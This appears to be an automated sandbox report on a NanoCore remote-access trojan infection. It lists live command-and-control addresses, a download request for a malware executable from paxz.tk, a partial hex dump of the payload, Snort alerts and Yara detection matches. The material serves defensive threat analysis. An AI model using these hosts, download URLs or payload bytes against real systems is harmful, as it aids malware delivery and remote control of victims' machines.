      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.58.149.41:80
      Source: global trafficDNS query: name: paxz.tk
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.58.149.41:80

      Networking

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.153.78.234:3132
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: vijayikohli1.bounceme.net
      Source: Malware configuration extractorURLs: 127.0.0.1
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Jan 2022 14:31:19 GMTServer: ApacheLast-Modified: Mon, 24 Jan 2022 10:15:50 GMTETag: "73800-5d65140bd6d4a"Accept-Ranges: bytesContent-Length: 473088Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 7b ee 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2c 07 00 00 0a 00 00 00 00 00 00 8e 4a 07 00 00 20 00 00 00 60 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 4a 07 00 4f 00 00 00 00 60 07 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 2a 07 00 00 20 00 00 00 2c 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 06 00 00 00 60 07 00 00 08 00 00 00 2e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 36 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 4a 07 00 00 00 00 00 48 00 00 00 02 00 05 00 60 b5 06 00 dc 94 00 00 03 00 00 00 30 01 00 06 28 f4 00 00 38 c1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 0e 00 00 00 12 00 00 00 13 00 00 00 02 00 00 00 0e 00 00 00 11 00 00 00 13 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 03 00 07 00 00 00 01 00 00 11 02 7b 0c 00 00 04 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 7d 0c 00 00 04 2a 13 30 03 00 4e 00 00 00 02 00 00 11 00 20 3d a8 47 f7 20 1b ea ff b9 61 25 0b 1a 5e 45 04 00 00 00 27 00 00 00 18 00 00 00 02 00 00 00 dc ff ff ff 2b 25 02 7b 05 00 00 04 0a 07 20 db 2a cb 8e 5a 20 08 c0 84 ef 61 2b c9 07 20 10 a0 54 ba 5a 20 8f 9e c1 02 61 2b ba 06 2a 00 00 13 30 03 00 3b 00 00 00 02 00 00 11 00 20 54 51 73 d5 20 63 5d 69 db 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 18 00 00 00 02 00 00 00 2b 16 02 7b 0d 00 00 04 0a 07 20 76 01 5f ad 5a 20 77 c1 cc c3 61 2b cd 06 2a 00 13 30 04 00 09 00 00 00 01 00 00 11 00 02 03 7d 0d 00 00 04 2a 00 00 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 02 7b 0a 00 00 04 0a 20 20 9d ef 9f 20 9a 47 4a 91 61 25 0b
      Source: global trafficHTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paxz.tkConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
      Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
      Source: Joe Sandbox ViewIP Address: 2.58.149.41 2.58.149.41
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 103.153.78.234:3132
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://google.com
      Source: plugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9EF1E3-15A6-45BA-9A80-F6F38BA9CAD0}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: paxz.tk
      Source: global trafficHTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paxz.tkConnection: Keep-Alive
      Source: RegSvcs.exeBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 9.2.RegSvcs.exe.d90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.5f0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4610000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.b50000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.b50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4610000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.a90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.ab0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.39a632e.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4600000.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.48fe8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.b80000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a2a09e.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.261c894.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.d90000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4850000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.a90000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.d80000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.b70000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.48f0000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.5f0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.37263cf.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.39a632e.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4600000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.37263cf.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.399d4ff.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.b70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a2a09e.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.382be55.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.d80000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.48f4c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.381fc21.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.2689300.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4850000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.3a12e3f.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.267d0b8.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.48f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
